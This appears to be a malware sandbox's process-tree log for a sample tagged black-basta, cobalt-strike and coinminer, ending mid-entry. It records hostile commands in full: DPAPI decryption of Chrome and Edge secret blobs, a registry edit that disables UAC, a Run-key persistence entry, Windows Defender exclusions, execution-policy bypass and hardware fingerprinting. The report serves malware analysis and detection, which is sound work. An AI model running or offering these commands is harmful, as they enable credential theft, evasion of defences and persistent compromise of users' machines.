  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\sjexrafr7k.ps1""
      4⤵
      PID:3388
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\sjexrafr7k.ps1"
        5⤵
        
        PID:1484
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qoqdr5b1\qoqdr5b1.cmdline"
        6⤵
        
        PID:3520
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD011.tmp" "c:\Users\Admin\AppData\Local\Temp\qoqdr5b1\CSCDDB0713730F946228A60C9258FEF2893.TMP"
        7⤵
        
        PID:1884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4812
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:2168
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:6136
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:1992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:2736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:5676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:4052
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:4600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:5096
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:1120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:2684
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:2852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:5436
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:5904
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.xFhroOAe5m""
      4⤵
      PID:4664
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.xFhroOAe5m"
        5⤵
        
        PID:3576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:5352
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        
        PID:892
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:1092
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:3192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:4912
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:3572
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:1816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:1056
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:2740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:2696
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:4472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:1480
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:1844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:2216
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:6040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:6092
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:5100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:5656
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:3784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:2460
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:4484
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:5892
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\MZpdY9tTti.ps1""
      4⤵
      PID:1184
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\MZpdY9tTti.ps1"
        5⤵
        
        PID:4832
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jb0z4ibk\jb0z4ibk.cmdline"
        6⤵
        
        PID:736
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA72.tmp" "c:\Users\Admin\AppData\Local\Temp\jb0z4ibk\CSC18FFB4E6E654E6992C49F376818EDA8.TMP"
        7⤵
        
        PID:4864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4492
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:5568
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:4984
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:3456
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:1984
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:4052
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:5020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:3100
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:2832
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:5448
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:3372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.xf2d4S9fIF""
      4⤵
      PID:4036
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.xf2d4S9fIF"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:2132
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:4496
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:2676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:1740
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:5040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:2212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:4752
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:4224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:5580
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:1836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:4568
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:1280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:1872
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:2152
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:4988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:1288
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:4108
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:1856
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:3576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\G9WGeNHx6J.ps1""
      4⤵
      PID:116
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\G9WGeNHx6J.ps1"
        5⤵
        
        PID:3684
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ogbiajb1\ogbiajb1.cmdline"
        6⤵
        
        PID:744
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE445.tmp" "c:\Users\Admin\AppData\Local\Temp\ogbiajb1\CSCB3B6F8BCA23E431AB563DD8DAD23668.TMP"
        7⤵
        
        PID:4348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:5044
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:3460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:4796
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:1728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:1984
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:1120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:1608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
